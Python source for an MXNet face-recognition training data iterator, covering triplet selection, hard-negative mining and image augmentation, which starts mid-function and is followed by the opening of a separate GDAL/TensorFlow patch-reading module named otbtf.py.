q_out.put( (a_idx, p_idx, n_idx) )
#emb_start_idx += nrof_images
print('exit',os.getpid())
class FaceImageIter(io.DataIter):
def __init__(self, batch_size, data_shape,
path_imgrec = None,
shuffle=False, aug_list=None, mean = None,
rand_mirror = False, cutoff = 0,
c2c_threshold = 0.0, output_c2c = 0, c2c_mode = -10, limit = 0,
ctx_num = 0, images_per_identity = 0, data_extra = None, hard_mining = False,
triplet_params = None, coco_mode = False,
mx_model = None,
data_name='data', label_name='softmax_label', **kwargs):
super(FaceImageIter, self).__init__()
assert path_imgrec
if path_imgrec:
logging.info('loading recordio %s...',
path_imgrec)
path_imgidx = path_imgrec[0:-4]+".idx"
self.imgrec = recordio.MXIndexedRecordIO(path_imgidx, path_imgrec, 'r') # pylint: disable=redefined-variable-type
s = self.imgrec.read_idx(0)
header, _ = recordio.unpack(s)
self.idx2cos = {}
self.idx2flag = {}
self.idx2meancos = {}
self.c2c_auto = False
#if output_c2c or c2c_threshold>0.0 or c2c_mode>=-5:
# path_c2c = os.path.join(os.path.dirname(path_imgrec), 'c2c')
# print(path_c2c)
# if os.path.exists(path_c2c):
# for line in open(path_c2c, 'r'):
# vec = line.strip().split(',')
# idx = int(vec[0])
# self.idx2cos[idx] = float(vec[1])
# self.idx2flag[idx] = 1
# if len(vec)>2:
# self.idx2flag[idx] = int(vec[2])
# else:
# self.c2c_auto = True
# self.c2c_step = 10000
if header.flag>0:
print('header0 label', header.label)
self.header0 = (int(header.label[0]), int(header.label[1]))
#assert(header.flag==1)
self.imgidx = range(1, int(header.label[0]))
if c2c_mode==0:
imgidx2 = []
for idx in self.imgidx:
c = self.idx2cos[idx]
f = self.idx2flag[idx]
if f!=1:
continue
imgidx2.append(idx)
print('idx count', len(self.imgidx), len(imgidx2))
self.imgidx = imgidx2
elif c2c_mode==1:
imgidx2 = []
tmp = []
for idx in self.imgidx:
c = self.idx2cos[idx]
f = self.idx2flag[idx]
if f==1:
imgidx2.append(idx)
else:
tmp.append( (idx, c) )
tmp = sorted(tmp, key = lambda x:x[1])
tmp = tmp[250000:300000]
for _t in tmp:
imgidx2.append(_t[0])
print('idx count', len(self.imgidx), len(imgidx2))
self.imgidx = imgidx2
elif c2c_mode==2:
imgidx2 = []
tmp = []
for idx in self.imgidx:
c = self.idx2cos[idx]
f = self.idx2flag[idx]
if f==1:
imgidx2.append(idx)
else:
tmp.append( (idx, c) )
tmp = sorted(tmp, key = lambda x:x[1])
tmp = tmp[200000:300000]
for _t in tmp:
imgidx2.append(_t[0])
print('idx count', len(self.imgidx), len(imgidx2))
self.imgidx = imgidx2
elif c2c_mode==-2:
imgidx2 = []
for idx in self.imgidx:
c = self.idx2cos[idx]
f = self.idx2flag[idx]
if f==2:
continue
if c<0.73:
continue
imgidx2.append(idx)
print('idx count', len(self.imgidx), len(imgidx2))
self.imgidx = imgidx2
elif c2c_threshold>0.0:
imgidx2 = []
for idx in self.imgidx:
c = self.idx2cos[idx]
f = self.idx2flag[idx]
if c<c2c_threshold:
continue
imgidx2.append(idx)
print(len(self.imgidx), len(imgidx2))
self.imgidx = imgidx2
self.id2range = {}
self.seq_identity = range(int(header.label[0]), int(header.label[1]))
c2c_stat = [0,0]
for identity in self.seq_identity:
s = self.imgrec.read_idx(identity)
header, _ = recordio.unpack(s)
a,b = int(header.label[0]), int(header.label[1])
self.id2range[identity] = (a,b)
count = b-a
if count>=output_c2c:
c2c_stat[1]+=1
else:
c2c_stat[0]+=1
for ii in xrange(a,b):
self.idx2flag[ii] = count
if len(self.idx2cos)>0:
m = 0.0
for ii in xrange(a,b):
m+=self.idx2cos[ii]
m/=(b-a)
for ii in xrange(a,b):
self.idx2meancos[ii] = m
#self.idx2meancos[identity] = m
print('id2range', len(self.id2range))
print(len(self.idx2cos), len(self.idx2meancos), len(self.idx2flag))
print('c2c_stat', c2c_stat)
if limit>0 and limit<len(self.imgidx):
random.seed(727)
prob = float(limit)/len(self.imgidx)
new_imgidx = []
new_ids = 0
for identity in self.seq_identity:
s = self.imgrec.read_idx(identity)
header, _ = recordio.unpack(s)
a,b = int(header.label[0]), int(header.label[1])
found = False
for _idx in xrange(a,b):
if random.random()<prob:
found = True
new_imgidx.append(_idx)
if found:
new_ids+=1
self.imgidx = new_imgidx
print('new ids', new_ids)
random.seed(None)
#random.Random(727).shuffle(self.imgidx)
#self.imgidx = self.imgidx[0:limit]
else:
self.imgidx = list(self.imgrec.keys)
if shuffle:
self.seq = self.imgidx
self.oseq = self.imgidx
print(len(self.seq))
else:
self.seq = None
self.mean = mean
self.nd_mean = None
if self.mean:
self.mean = np.array(self.mean, dtype=np.float32).reshape(1,1,3)
self.nd_mean = mx.nd.array(self.mean).reshape((1,1,3))
self.check_data_shape(data_shape)
self.provide_data = [(data_name, (batch_size,) + data_shape)]
self.batch_size = batch_size
self.data_shape = data_shape
self.shuffle = shuffle
self.image_size = '%d,%d'%(data_shape[1],data_shape[2])
self.rand_mirror = rand_mirror
print('rand_mirror', rand_mirror)
self.cutoff = cutoff
#self.cast_aug = mx.image.CastAug()
#self.color_aug = mx.image.ColorJitterAug(0.4, 0.4, 0.4)
self.ctx_num = ctx_num
self.c2c_threshold = c2c_threshold
self.output_c2c = output_c2c
self.per_batch_size = int(self.batch_size/self.ctx_num)
self.images_per_identity = images_per_identity
if self.images_per_identity>0:
self.identities = int(self.per_batch_size/self.images_per_identity)
self.per_identities = self.identities
self.repeat = 3000000.0/(self.images_per_identity*len(self.id2range))
self.repeat = int(self.repeat)
print(self.images_per_identity, self.identities, self.repeat)
self.data_extra = None
if data_extra is not None:
self.data_extra = nd.array(data_extra)
self.provide_data = [(data_name, (batch_size,) + data_shape), ('extra', data_extra.shape)]
self.hard_mining = hard_mining
self.mx_model = mx_model
if self.hard_mining:
assert self.images_per_identity>0
assert self.mx_model is not None
self.triplet_params = triplet_params
self.triplet_mode = False
self.coco_mode = coco_mode
if len(label_name)>0:
if output_c2c:
self.provide_label = [(label_name, (batch_size,2))]
else:
self.provide_label = [(label_name, (batch_size,))]
else:
self.provide_label = []
#print(self.provide_label[0][1])
if self.coco_mode:
assert self.triplet_params is None
assert self.images_per_identity>0
if self.triplet_params is not None:
assert self.images_per_identity>0
assert self.mx_model is not None
self.triplet_bag_size = self.triplet_params[0]
self.triplet_alpha = self.triplet_params[1]
self.triplet_max_ap = self.triplet_params[2]
assert self.triplet_bag_size>0
assert self.triplet_alpha>=0.0
assert self.triplet_alpha<=1.0
self.triplet_mode = True
self.triplet_oseq_cur = 0
self.triplet_oseq_reset()
self.seq_min_size = self.batch_size*2
self.cur = 0
self.nbatch = 0
self.is_init = False
self.times = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
#self.reset()
def ____pick_triplets(self, embeddings, nrof_images_per_class):
emb_start_idx = 0
people_per_batch = len(nrof_images_per_class)
nrof_threads = 8
q_in = multiprocessing.Queue()
q_out = multiprocessing.Queue()
processes = [multiprocessing.Process(target=pick_triplets_impl, args=(q_in, q_out)) \
for i in range(nrof_threads)]
for p in processes:
p.start()
# VGG Face: Choosing good triplets is crucial and should strike a balance between
# selecting informative (i.e. challenging) examples and swamping training with examples that
        # are too hard. This is achieved by extending each pair (a, p) to a triplet (a, p, n) by sampling
# the image n at random, but only between the ones that violate the triplet loss margin. The
# latter is a form of hard-negative mining, but it is not as aggressive (and much cheaper) than
# choosing the maximally violating example, as often done in structured output learning.
for i in xrange(people_per_batch):
nrof_images = int(nrof_images_per_class[i])
job = (embeddings, emb_start_idx, nrof_images, self.triplet_alpha)
emb_start_idx+=nrof_images
q_in.put(job)
for i in xrange(nrof_threads):
q_in.put(None)
print('joining')
for p in processes:
p.join()
print('joined')
q_out.put(None)
triplets = []
more = True
while more:
triplet = q_out.get()
if triplet is None:
more = False
else:
                triplets.append(triplet)
np.random.shuffle(triplets)
return triplets
#cal pairwise dists on single gpu
def _pairwise_dists(self, embeddings):
nd_embedding = mx.nd.array(embeddings, mx.gpu(0))
pdists = []
for idx in xrange(embeddings.shape[0]):
a_embedding = nd_embedding[idx]
body = mx.nd.broadcast_sub(a_embedding, nd_embedding)
body = body*body
body = mx.nd.sum_axis(body, axis=1)
ret = body.asnumpy()
#print(ret.shape)
pdists.append(ret)
return pdists
def pairwise_dists(self, embeddings):
nd_embedding_list = []
for i in xrange(self.ctx_num):
nd_embedding = mx.nd.array(embeddings, mx.gpu(i))
nd_embedding_list.append(nd_embedding)
nd_pdists = []
pdists = []
for idx in xrange(embeddings.shape[0]):
emb_idx = idx%self.ctx_num
nd_embedding = nd_embedding_list[emb_idx]
a_embedding = nd_embedding[idx]
body = mx.nd.broadcast_sub(a_embedding, nd_embedding)
body = body*body
body = mx.nd.sum_axis(body, axis=1)
nd_pdists.append(body)
if len(nd_pdists)==self.ctx_num or idx==embeddings.shape[0]-1:
for x in nd_pdists:
pdists.append(x.asnumpy())
nd_pdists = []
return pdists
def pick_triplets(self, embeddings, nrof_images_per_class):
emb_start_idx = 0
triplets = []
people_per_batch = len(nrof_images_per_class)
#self.time_reset()
pdists = self.pairwise_dists(embeddings)
#self.times[3] += self.time_elapsed()
for i in xrange(people_per_batch):
nrof_images = int(nrof_images_per_class[i])
for j in xrange(1,nrof_images):
#self.time_reset()
a_idx = emb_start_idx + j - 1
#neg_dists_sqr = np.sum(np.square(embeddings[a_idx] - embeddings), 1)
neg_dists_sqr = pdists[a_idx]
#self.times[3] += self.time_elapsed()
for pair in xrange(j, nrof_images): # For every possible positive pair.
p_idx = emb_start_idx + pair
#self.time_reset()
pos_dist_sqr = np.sum(np.square(embeddings[a_idx]-embeddings[p_idx]))
#self.times[4] += self.time_elapsed()
#self.time_reset()
neg_dists_sqr[emb_start_idx:emb_start_idx+nrof_images] = np.NaN
if self.triplet_max_ap>0.0:
if pos_dist_sqr>self.triplet_max_ap:
continue
all_neg = np.where(np.logical_and(neg_dists_sqr-pos_dist_sqr<self.triplet_alpha, pos_dist_sqr<neg_dists_sqr))[0] # FaceNet selection
#self.times[5] += self.time_elapsed()
#self.time_reset()
                    #all_neg = np.where(neg_dists_sqr-pos_dist_sqr<alpha)[0] # VGG Face selection
nrof_random_negs = all_neg.shape[0]
if nrof_random_negs>0:
rnd_idx = np.random.randint(nrof_random_negs)
n_idx = all_neg[rnd_idx]
triplets.append( (a_idx, p_idx, n_idx) )
emb_start_idx += nrof_images
np.random.shuffle(triplets)
return triplets
def __pick_triplets(self, embeddings, nrof_images_per_class):
emb_start_idx = 0
triplets = []
people_per_batch = len(nrof_images_per_class)
for i in xrange(people_per_batch):
nrof_images = int(nrof_images_per_class[i])
if nrof_images<2:
continue
for j in xrange(1,nrof_images):
a_idx = emb_start_idx + j - 1
pcount = nrof_images-1
dists_a2all = np.sum(np.square(embeddings[a_idx] - embeddings), 1) #(N,)
#print(a_idx, dists_a2all.shape)
ba = emb_start_idx
bb = emb_start_idx+nrof_images
sorted_idx = np.argsort(dists_a2all)
#print('assert', sorted_idx[0], a_idx)
#assert sorted_idx[0]==a_idx
#for idx in sorted_idx:
# print(idx, dists_a2all[idx])
p2n_map = {}
pfound = 0
for idx in sorted_idx:
if idx==a_idx: #is anchor
continue
if idx<bb and idx>=ba: #is pos
p2n_map[idx] = [dists_a2all[idx], []] #ap, [neg_list]
pfound+=1
else: # is neg
an = dists_a2all[idx]
if pfound==pcount and len(p2n_map)==0:
break
to_del = []
for p_idx in p2n_map:
v = p2n_map[p_idx]
an_ap = an - v[0]
if an_ap<self.triplet_alpha:
v[1].append(idx)
else:
#output
if len(v[1])>0:
n_idx = random.choice(v[1])
triplets.append( (a_idx, p_idx, n_idx) )
to_del.append(p_idx)
for _del in to_del:
del p2n_map[_del]
for p_idx,v in p2n_map.iteritems():
if len(v[1])>0:
n_idx = random.choice(v[1])
triplets.append( (a_idx, p_idx, n_idx) )
emb_start_idx += nrof_images
np.random.shuffle(triplets)
return triplets
def triplet_oseq_reset(self):
#reset self.oseq by identities seq
self.triplet_oseq_cur = 0
ids = []
for k in self.id2range:
ids.append(k)
random.shuffle(ids)
self.oseq = []
for _id in ids:
v = self.id2range[_id]
_list = range(*v)
random.shuffle(_list)
if len(_list)>self.images_per_identity:
_list = _list[0:self.images_per_identity]
self.oseq += _list
print('oseq', len(self.oseq))
def time_reset(self):
self.time_now = datetime.datetime.now()
def time_elapsed(self):
time_now = datetime.datetime.now()
diff = time_now - self.time_now
return diff.total_seconds()
def select_triplets(self):
self.seq = []
while len(self.seq)<self.seq_min_size:
self.time_reset()
embeddings = None
bag_size = self.triplet_bag_size
batch_size = self.batch_size
#data = np.zeros( (bag_size,)+self.data_shape )
#label = np.zeros( (bag_size,) )
tag = []
#idx = np.zeros( (bag_size,) )
print('eval %d images..'%bag_size, self.triplet_oseq_cur)
print('triplet time stat', self.times)
if self.triplet_oseq_cur+bag_size>len(self.oseq):
self.triplet_oseq_reset()
print('eval %d images..'%bag_size, self.triplet_oseq_cur)
self.times[0] += self.time_elapsed()
self.time_reset()
#print(data.shape)
data = nd.zeros( self.provide_data[0][1] )
label = nd.zeros( self.provide_label[0][1] )
ba = 0
while True:
bb = min(ba+batch_size, bag_size)
if ba>=bb:
break
#_batch = self.data_iter.next()
#_data = _batch.data[0].asnumpy()
#print(_data.shape)
#_label = _batch.label[0].asnumpy()
#data[ba:bb,:,:,:] = _data
#label[ba:bb] = _label
for i in xrange(ba, bb):
_idx = self.oseq[i+self.triplet_oseq_cur]
s = self.imgrec.read_idx(_idx)
header, img = recordio.unpack(s)
img = self.imdecode(img)
data[i-ba][:] = self.postprocess_data(img)
label[i-ba][:] = header.label
tag.append( ( int(header.label), _idx) )
#idx[i] = _idx
db = mx.io.DataBatch(data=(data,), label=(label,))
self.mx_model.forward(db, is_train=False)
net_out = self.mx_model.get_outputs()
#print('eval for selecting triplets',ba,bb)
#print(net_out)
#print(len(net_out))
#print(net_out[0].asnumpy())
net_out = net_out[0].asnumpy()
#print(net_out)
#print('net_out', net_out.shape)
if embeddings is None:
embeddings = np.zeros( (bag_size, net_out.shape[1]))
embeddings[ba:bb,:] = net_out
ba = bb
assert len(tag)==bag_size
self.triplet_oseq_cur+=bag_size
embeddings = sklearn.preprocessing.normalize(embeddings)
self.times[1] += self.time_elapsed()
self.time_reset()
nrof_images_per_class = [1]
for i in xrange(1, bag_size):
if tag[i][0]==tag[i-1][0]:
nrof_images_per_class[-1]+=1
else:
nrof_images_per_class.append(1)
triplets = self.pick_triplets(embeddings, nrof_images_per_class) # shape=(T,3)
print('found triplets', len(triplets))
ba = 0
while True:
bb = ba+self.per_batch_size//3
if bb>len(triplets):
break
_triplets = triplets[ba:bb]
for i in xrange(3):
for triplet in _triplets:
_pos = triplet[i]
_idx = tag[_pos][1]
self.seq.append(_idx)
ba = bb
self.times[2] += self.time_elapsed()
def triplet_reset(self):
self.select_triplets()
def hard_mining_reset(self):
#import faiss
from annoy import AnnoyIndex
data = nd.zeros( self.provide_data[0][1] )
label = nd.zeros( self.provide_label[0][1] )
#label = np.zeros( self.provide_label[0][1] )
X = None
ba = 0
batch_num = 0
while ba<len(self.oseq):
batch_num+=1
if batch_num%10==0:
print('loading batch',batch_num, ba)
bb = min(ba+self.batch_size, len(self.oseq))
_count = bb-ba
for i in xrange(_count):
idx = self.oseq[i+ba]
s = self.imgrec.read_idx(idx)
header, img = recordio.unpack(s)
img = self.imdecode(img)
data[i][:] = self.postprocess_data(img)
label[i][:] = header.label
db = mx.io.DataBatch(data=(data,self.data_extra), label=(label,))
self.mx_model.forward(db, is_train=False)
net_out = self.mx_model.get_outputs()
embedding = net_out[0].asnumpy()
nembedding = sklearn.preprocessing.normalize(embedding)
if _count<self.batch_size:
nembedding = nembedding[0:_count,:]
if X is None:
X = np.zeros( (len(self.id2range), nembedding.shape[1]), dtype=np.float32 )
nplabel = label.asnumpy()
for i in xrange(_count):
ilabel = int(nplabel[i])
#print(ilabel, ilabel.__class__)
X[ilabel] += nembedding[i]
ba = bb
X = sklearn.preprocessing.normalize(X)
d = X.shape[1]
t = AnnoyIndex(d, metric='euclidean')
for i in xrange(X.shape[0]):
t.add_item(i, X[i])
print('start to build index')
t.build(20)
print(X.shape)
k = self.per_identities
self.seq = []
for i in xrange(X.shape[0]):
nnlist = t.get_nns_by_item(i, k)
assert nnlist[0]==i
for _label in nnlist:
assert _label<len(self.id2range)
_id = self.header0[0]+_label
v = self.id2range[_id]
_list = range(*v)
if len(_list)<self.images_per_identity:
random.shuffle(_list)
else:
_list = np.random.choice(_list, self.images_per_identity, replace=False)
for i in xrange(self.images_per_identity):
_idx = _list[i%len(_list)]
self.seq.append(_idx)
#faiss_params = [20,5]
#quantizer = faiss.IndexFlatL2(d) # the other index
#index = faiss.IndexIVFFlat(quantizer, d, faiss_params[0], faiss.METRIC_L2)
#assert not index.is_trained
#index.train(X)
#index.add(X)
#assert index.is_trained
#print('trained')
#index.nprobe = faiss_params[1]
#D, I = index.search(X, k) # actual search
#print(I.shape)
#self.seq = []
#for i in xrange(I.shape[0]):
# #assert I[i][0]==i
# for j in xrange(k):
# _label = I[i][j]
# assert _label<len(self.id2range)
# _id = self.header0[0]+_label
# v = self.id2range[_id]
# _list = range(*v)
# if len(_list)<self.images_per_identity:
# random.shuffle(_list)
# else:
# _list = np.random.choice(_list, self.images_per_identity, replace=False)
# for i in xrange(self.images_per_identity):
# _idx = _list[i%len(_list)]
# self.seq.append(_idx)
    def reset_c2c(self):
        # Recomputes self.idx2cos: for each identity, the cosine similarity of every
        # image embedding to the (normalized) mean embedding of that identity.
        self.select_triplets()
        for identity, v in self.id2range.iteritems():
            _list = range(*v)
            ocontents = []
            for idx in _list:
                s = self.imgrec.read_idx(idx)
                ocontents.append(s)
            embeddings = None
            #print(len(ocontents))
            ba = 0
            while True:
                bb = min(ba+self.batch_size, len(ocontents))
                if ba>=bb:
                    break
                _batch_size = bb-ba
                _batch_size2 = max(_batch_size, self.ctx_num)
                data = nd.zeros( (_batch_size2, 3, self.data_shape[1], self.data_shape[2]) )
                label = nd.zeros( (_batch_size2,) )
                count = bb-ba
                ii = 0
                for i in xrange(ba, bb):
                    header, img = mx.recordio.unpack(ocontents[i])
                    img = mx.image.imdecode(img)
                    img = nd.transpose(img, axes=(2, 0, 1))
                    data[ii][:] = img
                    label[ii][:] = header.label
                    ii += 1
                while ii<_batch_size2:
                    data[ii][:] = data[0][:]
                    label[ii][:] = label[0][:]
                    ii += 1
                db = mx.io.DataBatch(data=(data,), label=(label,))
                self.mx_model.forward(db, is_train=False)
                net_out = self.mx_model.get_outputs()
                net_out = net_out[0].asnumpy()
                if embeddings is None:
                    embeddings = np.zeros( (len(ocontents), net_out.shape[1]) )
                embeddings[ba:bb,:] = net_out[0:_batch_size,:]
                ba = bb
            embeddings = sklearn.preprocessing.normalize(embeddings)
            embedding = np.mean(embeddings, axis=0, keepdims=True)
            embedding = sklearn.preprocessing.normalize(embedding)
            sims = np.dot(embeddings, embedding.T).flatten()
            assert len(sims)==len(_list)
            for i in xrange(len(_list)):
                _idx = _list[i]
                self.idx2cos[_idx] = sims[i]
def reset(self):
"""Resets the iterator to the beginning of the data."""
print('call reset()')
if self.c2c_auto:
self.reset_c2c()
self.cur = 0
if self.images_per_identity>0:
if self.triplet_mode:
self.triplet_reset()
elif not self.hard_mining:
self.seq = []
idlist = []
for _id,v in self.id2range.iteritems():
idlist.append((_id,range(*v)))
for r in xrange(self.repeat):
if r%10==0:
print('repeat', r)
if self.shuffle:
random.shuffle(idlist)
for item in idlist:
_id = item[0]
_list = item[1]
#random.shuffle(_list)
if len(_list)<self.images_per_identity:
random.shuffle(_list)
else:
_list = np.random.choice(_list, self.images_per_identity, replace=False)
for i in xrange(self.images_per_identity):
_idx = _list[i%len(_list)]
self.seq.append(_idx)
else:
self.hard_mining_reset()
print('seq len', len(self.seq))
else:
if self.shuffle:
random.shuffle(self.seq)
if self.seq is None and self.imgrec is not None:
self.imgrec.reset()
def num_samples(self):
return len(self.seq)
def next_sample(self):
"""Helper function for reading in next sample."""
        #set total batch size, for example 1800, and maximum number of images per identity, for example 45
if self.seq is not None:
while True:
if self.cur >= len(self.seq):
raise StopIteration
idx = self.seq[self.cur]
self.cur += 1
if self.imgrec is not None:
s = self.imgrec.read_idx(idx)
header, img = recordio.unpack(s)
label = header.label
if self.output_c2c:
count = self.idx2flag[idx]
if self.output_c2c==1:
v = np.random.uniform(0.4, 0.5)
elif self.output_c2c==2:
v = np.random.uniform(0.4, 0.5)
if count>=self.output_c2c:
v = np.random.uniform(0.3, 0.4)
elif self.output_c2c==3:
v = (9.5 - math.log(2.0+count))/10.0
v = min(max(v, 0.3), 0.5)
elif self.output_c2c==4:
mu = 0.0
sigma = 0.1
mrange = [0.4,0.5]
                            v = np.random.normal(mu, sigma)
                            v = abs(v)*-1.0+mrange[1]
v = max(v, mrange[0])
elif self.output_c2c==5:
v = np.random.uniform(0.41, 0.51)
if count>=175:
v = np.random.uniform(0.37, 0.47)
elif self.output_c2c==6:
v = np.random.uniform(0.41, 0.51)
if count>=175:
v = np.random.uniform(0.38, 0.48)
else:
assert False
label = [label, v]
else:
if not isinstance(label, numbers.Number):
label = label[0]
return label, img, None, None
else:
label, fname, bbox, landmark = self.imglist[idx]
return label, self.read_image(fname), bbox, landmark
else:
s = self.imgrec.read()
if s is None:
raise StopIteration
header, img = recordio.unpack(s)
return header.label, img, None, None
def brightness_aug(self, src, x):
alpha = 1.0 + random.uniform(-x, x)
src *= alpha
return src
def contrast_aug(self, src, x):
alpha = 1.0 + random.uniform(-x, x)
coef = np.array([[[0.299, 0.587, 0.114]]])
gray = src * coef
gray = (3.0 * (1.0 - alpha) / gray.size) * np.sum(gray)
src *= alpha
src += gray
return src
def saturation_aug(self, src, x):
alpha = 1.0 + random.uniform(-x, x)
coef = np.array([[[0.299, 0.587, 0.114]]])
gray = src * coef
gray = np.sum(gray, axis=2, keepdims=True)
gray *= (1.0 - alpha)
src *= alpha
src += gray
return src
def color_aug(self, img, x):
augs = [self.brightness_aug, self.contrast_aug, self.saturation_aug]
random.shuffle(augs)
for aug in augs:
#print(img.shape)
img = aug(img, x)
#print(img.shape)
return img
def mirror_aug(self, img):
_rd = random.randint(0,1)
if _rd==1:
for c in xrange(img.shape[2]):
img[:,:,c] = np.fliplr(img[:,:,c])
return img
    def next(self):
        """Returns the next batch of data."""
        if not self.is_init:
            self.reset()
            self.is_init = True
#print('in next', self.cur, self.labelcur)
self.nbatch+=1
batch_size = self.batch_size
c, h, w = self.data_shape
batch_data = nd.empty((batch_size, c, h, w))
if self.provide_label: # is not None:
batch_label = nd.empty(self.provide_label[0][1])
else:
batch_label = nd.empty((batch_size,))
i = 0
try:
while i < batch_size:
label, s, bbox, landmark = self.next_sample()
_data = self.imdecode(s)
if self.rand_mirror:
_rd = random.randint(0,1)
if _rd==1:
_data = mx.ndarray.flip(data=_data, axis=1)
if self.nd_mean is not None:
_data = _data.astype('float32')
_data -= self.nd_mean
_data *= 0.0078125
if self.cutoff>0:
centerh = random.randint(0, _data.shape[0]-1)
centerw = random.randint(0, _data.shape[1]-1)
half = self.cutoff//2
starth = max(0, centerh-half)
endh = min(_data.shape[0], centerh+half)
startw = max(0, centerw-half)
endw = min(_data.shape[1], centerw+half)
_data = _data.astype('float32')
#print(starth, endh, startw, endw, _data.shape)
_data[starth:endh, startw:endw, :] = 127.5
#_npdata = _data.asnumpy()
#if landmark is not None:
# _npdata = face_preprocess.preprocess(_npdata, bbox = bbox, landmark=landmark, image_size=self.image_size)
#if self.rand_mirror:
# _npdata = self.mirror_aug(_npdata)
#if self.mean is not None:
# _npdata = _npdata.astype(np.float32)
# _npdata -= self.mean
# _npdata *= 0.0078125
#nimg = np.zeros(_npdata.shape, dtype=np.float32)
#nimg[self.patch[1]:self.patch[3],self.patch[0]:self.patch[2],:] = _npdata[self.patch[1]:self.patch[3], self.patch[0]:self.patch[2], :]
#_data = mx.nd.array(nimg)
data = [_data]
try:
self.check_valid_image(data)
except RuntimeError as e:
logging.debug('Invalid image, skipping: %s', str(e))
continue
#print('aa',data[0].shape)
#data = self.augmentation_transform(data)
#print('bb',data[0].shape)
for datum in data:
assert i < batch_size, 'Batch size must be multiples of augmenter output length'
#print(datum.shape)
batch_data[i][:] = self.postprocess_data(datum)
if self.provide_label is not None:
if not self.coco_mode:
if len(batch_label.shape)==1:
batch_label[i][:] = label
else:
for ll in xrange(batch_label.shape[1]):
v = label[ll]
if ll>0:
#c2c = v
#_param = [0.5, 0.4, 0.85, 0.75]
#_a = (_param[1]-_param[0])/(_param[3]-_param[2])
#m = _param[1]+_a*(c2c-_param[3])
#m = min(_param[0], max(_param[1],m))
#v = math.cos(m)
#v = v*v
m = v
v = math.cos(m)
v = v*v
#print('m', i,m,v)
batch_label[i][ll] = v
else:
batch_label[i][:] = (i%self.per_batch_size)//self.images_per_identity
i += 1
except StopIteration:
if i<batch_size:
raise StopIteration
#print('next end', batch_size, i)
_label = None
if self.provide_label is not None:
_label = [batch_label]
if self.data_extra is not None:
return io.DataBatch([batch_data, self.data_extra], _label, batch_size - i)
else:
return io.DataBatch([batch_data], _label, batch_size - i)
def check_data_shape(self, data_shape):
"""Checks if the input data shape is valid"""
if not len(data_shape) == 3:
raise ValueError('data_shape should have length 3, with dimensions CxHxW')
if not data_shape[0] == 3:
raise ValueError('This iterator expects inputs to have 3 channels.')
def check_valid_image(self, data):
"""Checks if the input data is valid"""
if len(data[0].shape) == 0:
raise RuntimeError('Data shape is wrong')
def imdecode(self, s):
"""Decodes a string or byte string to an NDArray.
See mx.img.imdecode for more details."""
img = mx.image.imdecode(s) #mx.ndarray
return img
def read_image(self, fname):
"""Reads an input image `fname` and returns the decoded raw bytes.
Example usage:
----------
>>> dataIter.read_image('Face.jpg') # returns decoded raw bytes.
"""
with open(os.path.join(self.path_root, fname), 'rb') as fin:
img = fin.read()
return img
def augmentation_transform(self, data):
"""Transforms input data with specified augmentation."""
for aug in self.auglist:
data = [ret for src in data for ret in aug(src)]
return data
def postprocess_data(self, datum):
"""Final postprocessing step before image is loaded into the batch."""
return nd.transpose(datum, axes=(2, 0, 1))
class FaceImageIterList(io.DataIter):
def __init__(self, iter_list):
assert len(iter_list)>0
self.provide_data = iter_list[0].provide_data
self.provide_label = iter_list[0].provide_label
self.iter_list = iter_list
self.cur_iter = None
def reset(self):
self.cur_iter.reset()
def next(self):
self.cur_iter = random.choice(self.iter_list)
while True:
try:
ret = self.cur_iter.next()
except StopIteration:
self.cur_iter.reset()
continue
return ret
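# Hypothetical usage sketch (paths and hyper-parameters are illustrative only;
# a matching train.idx file is expected next to the .rec file):
#
#   train_iter = FaceImageIter(
#       batch_size=128,
#       data_shape=(3, 112, 112),
#       path_imgrec='/data/faces/train.rec',
#       shuffle=True,
#       rand_mirror=True,
#       ctx_num=1,
#   )
#   batch = train_iter.next()   # an mx.io.DataBatch with data and softmax_label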
|
otbtf.py
|
# -*- coding: utf-8 -*-
# ==========================================================================
#
# Copyright 2018-2019 Remi Cresson (IRSTEA)
# Copyright 2020 Remi Cresson (INRAE)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ==========================================================================*/
import threading
import multiprocessing
import time
import numpy as np
import tensorflow as tf
import gdal
import logging
from abc import ABC, abstractmethod
"""
------------------------------------------------------- Helpers --------------------------------------------------------
"""
def gdal_open(filename):
"""
Open a GDAL raster
:param filename: raster file
:return: a GDAL ds instance
"""
ds = gdal.Open(filename)
if ds is None:
raise Exception("Unable to open file {}".format(filename))
return ds
def read_as_np_arr(ds, as_patches=True):
"""
Read a GDAL raster as numpy array
:param ds: GDAL ds instance
:param as_patches: if True, the returned numpy array has the following shape (n, psz_x, psz_x, nb_channels). If
False, the shape is (1, psz_y, psz_x, nb_channels)
:return: Numpy array of dim 4
"""
buffer = ds.ReadAsArray()
szx = ds.RasterXSize
if len(buffer.shape) == 3:
buffer = np.transpose(buffer, axes=(1, 2, 0))
if not as_patches:
n = 1
szy = ds.RasterYSize
else:
n = int(ds.RasterYSize / szx)
szy = szx
return np.float32(buffer.reshape((n, szy, szx, ds.RasterCount)))
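# Shape example (follows directly from the code above): a patches image with
# RasterXSize=16, RasterYSize=160 and RasterCount=4 yields an array of shape
# (10, 16, 16, 4) when as_patches=True, and (1, 160, 16, 4) when as_patches=False.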
"""
---------------------------------------------------- Buffer class ------------------------------------------------------
"""
class Buffer:
"""
    Used to store and access a list of objects
"""
def __init__(self, max_length):
self.max_length = max_length
self.container = []
def size(self):
return len(self.container)
def add(self, x):
self.container.append(x)
assert (self.size() <= self.max_length)
def is_complete(self):
return self.size() == self.max_length
"""
------------------------------------------------ PatchesReaderBase class -----------------------------------------------
"""
class PatchesReaderBase(ABC):
"""
Base class for patches delivery
"""
@abstractmethod
def get_sample(self, index):
"""
Return one sample.
:return One sample instance, whatever the sample structure is (dict, numpy array, ...)
"""
pass
@abstractmethod
def get_stats(self) -> dict:
"""
Compute some statistics for each source.
        Depending on whether streaming is used, the statistics are computed directly in memory, or chunk-by-chunk.
:return a dict having the following structure:
{
"src_key_0":
{"min": np.array([...]),
"max": np.array([...]),
"mean": np.array([...]),
"std": np.array([...])},
...,
"src_key_M":
{"min": np.array([...]),
"max": np.array([...]),
"mean": np.array([...]),
"std": np.array([...])},
}
"""
pass
@abstractmethod
def get_size(self):
"""
Returns the total number of samples
:return: number of samples (int)
"""
pass
"""
----------------------------------------------- PatchesImagesReader class ----------------------------------------------
"""
